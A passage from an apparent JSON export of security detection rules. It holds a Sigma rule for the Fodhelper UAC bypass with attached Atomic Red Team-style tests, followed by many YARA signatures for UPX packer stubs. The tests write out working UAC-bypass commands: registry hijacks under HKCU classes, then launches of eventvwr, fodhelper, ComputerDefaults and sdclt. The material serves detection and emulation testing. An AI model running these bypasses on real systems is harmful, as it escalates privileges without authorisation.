            "rule": "title: Fodhelper UAC Bypass\r\nstatus: experimental\r\ndescription: Fodhelper UAC Bypass\r\nauthor: Joe Security\r\ndate: 2020-07-30\r\nid: 200082\r\nthreatname:\r\nbehaviorgroup: 26\r\nclassification: 7\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*reg add*hkcu\\software\\classes\\ms-settings\\shell\\open\\command*'\r\n      condition: selection\r\nlevel: critical\r\nattack_technique: T1548.002\r\ndisplay_name: 'Abuse Elevation Control Mechanism: Bypass User Access Control'\r\natomic_tests:\r\n- name: Bypass UAC using Event Viewer (cmd)\r\n  auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9\r\n  description: |\r\n    Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\r\n    Upon execution command prompt should be launched with administrative privelages\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      reg.exe add hkcu\\software\\classes\\mscfile\\shell\\open\\command /ve /d \"#{executable_binary}\" /f\r\n      cmd.exe /c eventvwr.msc\r\n    cleanup_command: |\r\n      reg.exe delete hkcu\\software\\classes\\mscfile /f >nul 2>&1\r\n    name: command_prompt\r\n- name: Bypass UAC using Event Viewer (PowerShell)\r\n  auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b\r\n  description: |\r\n    PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. 
More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\r\n    Upon execution command prompt should be launched with administrative privelages\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      New-Item \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Force\r\n      Set-ItemProperty \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n      Start-Process \"C:\\Windows\\System32\\eventvwr.msc\"\r\n    cleanup_command: |\r\n      Remove-Item \"HKCU:\\software\\classes\\mscfile\" -force -Recurse -ErrorAction Ignore\r\n    name: powershell\r\n- name: Bypass UAC using Fodhelper\r\n  auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182\r\n  description: |\r\n    Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). 
Requires Windows 10.\r\n    Upon execution, \"The operation completed successfully.\" will be shown twice and command prompt will be opened.\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"#{executable_binary}\" /f\r\n      reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\r\n      fodhelper.exe\r\n    cleanup_command: |\r\n      reg.exe delete hkcu\\software\\classes\\ms-settings /f >nul 2>&1\r\n    name: command_prompt\r\n- name: Bypass UAC using Fodhelper - PowerShell\r\n  auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa\r\n  description: |\r\n    PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). 
Requires Windows 10.\r\n    Upon execution command prompt will be opened.\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\r\n      New-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\r\n      Set-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n      Start-Process \"C:\\Windows\\System32\\fodhelper.exe\"\r\n    cleanup_command: |\r\n      Remove-Item \"HKCU:\\software\\classes\\ms-settings\" -force -Recurse -ErrorAction Ignore\r\n    name: powershell\r\n- name: Bypass UAC using ComputerDefaults (PowerShell)\r\n  auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f\r\n  description: |\r\n    PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10\r\n    Upon execution administrative command prompt should open\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\r\n      New-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\r\n      Set-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n      Start-Process \"C:\\Windows\\System32\\ComputerDefaults.exe\"\r\n    cleanup_command: |\r\n      Remove-Item \"HKCU:\\software\\classes\\ms-settings\" -force 
-Recurse -ErrorAction Ignore\r\n    name: powershell\r\n    elevation_required: true\r\n- name: Bypass UAC by Mocking Trusted Directories\r\n  auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1\r\n  description: |\r\n    Creates a fake \"trusted directory\" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems\r\n    Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    executable_binary:\r\n      description: Binary to execute with UAC Bypass\r\n      type: path\r\n      default: C:\\Windows\\System32\\cmd.exe\r\n  executor:\r\n    command: |\r\n      mkdir \"\\\\?\\C:\\Windows \\System32\\\"\r\n      copy \"#{executable_binary}\" \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\r\n      mklink c:\\testbypass.exe \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\r\n    cleanup_command: |\r\n      rd \"\\\\?\\C:\\Windows \\\" /S /Q >nul 2>nul\r\n      del \"c:\\testbypass.exe\" >nul 2>nul\r\n    name: command_prompt\r\n    elevation_required: true\r\n- name: Bypass UAC using sdclt DelegateExecute\r\n  auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7\r\n  description: |\r\n    Bypasses User Account Control using a fileless method, registry only. 
\r\n    Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\r\n    [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\r\n    Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\r\n  supported_platforms:\r\n  - windows\r\n  input_arguments:\r\n    command.to.execute:\r\n      description: Command to execute\r\n      type: string\r\n      default: cmd.exe /c notepad.exe\r\n  executor:\r\n    command: |\r\n      New-Item -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Value '#{command.to.execute}'\r\n      New-ItemProperty -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Name \"DelegateExecute\"\r\n      Start-Process -FilePath $env:windir\\system32\\sdclt.exe\r\n      Start-Sleep -s 3\r\n    cleanup_command: |\r\n      Remove-Item -Path \"HKCU:\\Software\\Classes\\Folder\" -Recurse -Force -ErrorAction Ignore\r\n    name: powershell"
        },
        {
            "id": 102,
            "key": "upx-packer",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "UPX Packer",
            "rule": "rule UPX_v30_EXE_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 57 83 C3 04 53 68 ?? ?? ?? 00 56 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8D ?? ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC 2E ?? ?? ?? ?? 73 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_020_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 AF AD 0E 0E 0E 06 1F 07 16 68 00 00 BD FF FF F7 E1 93 CB 55 50 58 21 03 03 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Delphi_stub_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x_2: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_302: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Scrambler_RC_v1x: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 61 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n        $b = { 66 C7 05 ?? ?? ?? ?? 75 07 E9 ?? FE FF FF 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 
00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Delphi_stub_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_b_Farb_rausch_Consumer_Consulting: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_MANtiCORE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_c_Farb_rausch_Consumer_Consulting: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 
8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n        $b = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_070_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 99 01 00 00 60 E8 00 00 00 00 58 83 E8 48 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 FC 01 00 00 83 CD FF 31 DB EB 0C 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Alternative_stub_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_123_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 33 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_071_072_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA 00 00 FF 57 66 81 87 00 00 00 00 00 00 81 C6 B3 01 00 00 EB 0A 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_b_Farb_rausch_Consumer_Consulting_: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 
57 83 CD FF FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 B3 01 56 89 FE 29 C6 F3 A4 5E EB 8E 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 E8 EE FF FF FF 11 C9 E8 E7 FF FF FF 72 F2 C3 31 C0 31 DB 31 C9 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 89 D8 E2 D9 8D BE ?? ?? ?? ?? 8B 07 09 C0 74 45 8B 5F 04 8D 84 30 ?? ?? ?? ?? 01 F3 50 83 C7 08 FF 96 ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 ?? ?? ?? ?? 61 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PackerUPX_CompresorGratuito_wwwupxsourceforgenet: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?0 ?? 00 8D BE ?? ?? F? 
FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_050_070: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_071_072_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE EF 00 00 FF 57 66 81 87 00 00 00 00 00 00 81 C6 B1 01 00 00 EB 07 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_dos_exe_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8C C8 05 ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_MANtiCORE_: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V194_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_MANtiCORE_: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_com: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? 
BF C0 FF FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Alternative_stub_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 EB EA EB FC 8A 06 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v080_v084_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_DLL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v072_Hint_DOS_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 83 ?? ?? 31 DB 5E 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXLock_v11_CyberDoom_Bob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? 00 60 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_DLL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_p_ECLiPSE_layer: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 
33 D2 EB 01 0F 56 EB 01 0F E8 03 00 00 00 EB 01 0F EB 01 0F 5E EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_sibaway7yahoocom: PEiD\r\n{\r\n    strings:\r\n        $a = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_UPX_0896_102_105_124_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v20_Markus_Laszlo_Reiser_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_V3042005_MANtiCORE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? ?? ?? ?? ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? ?? 
C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_v10_CyberDoom_Team_X: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v081_v084_Modified: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 ?? ?? ?? 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 }\r\n        $b = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_V194_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_p_ECLiPSE_layer_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 D2 EB 01 0F 56 EB 01 0F E8 03 00 00 00 EB 01 0F EB 01 0F 5E EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_120_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 30 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_124_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 34 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modifier_v01x: PEiD\r\n{\r\n    strings:\r\n        $a = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_pe_exe: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_stub_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 
57 83 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8A 14 08 80 F2 ?? 88 14 08 41 83 F9 ?? 75 F1 }\r\n        $b = { 60 B8 ?? ?? ?? 00 B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPXHiT_v001_DJ_Siba: PEiD\r\n{\r\n    strings:\r\n        $a = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v060_v061: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 E8 3D 50 8D B8 FF 57 66 81 87 8D B0 F0 01 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 }\r\n        $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 E8 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_293_LZMA: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 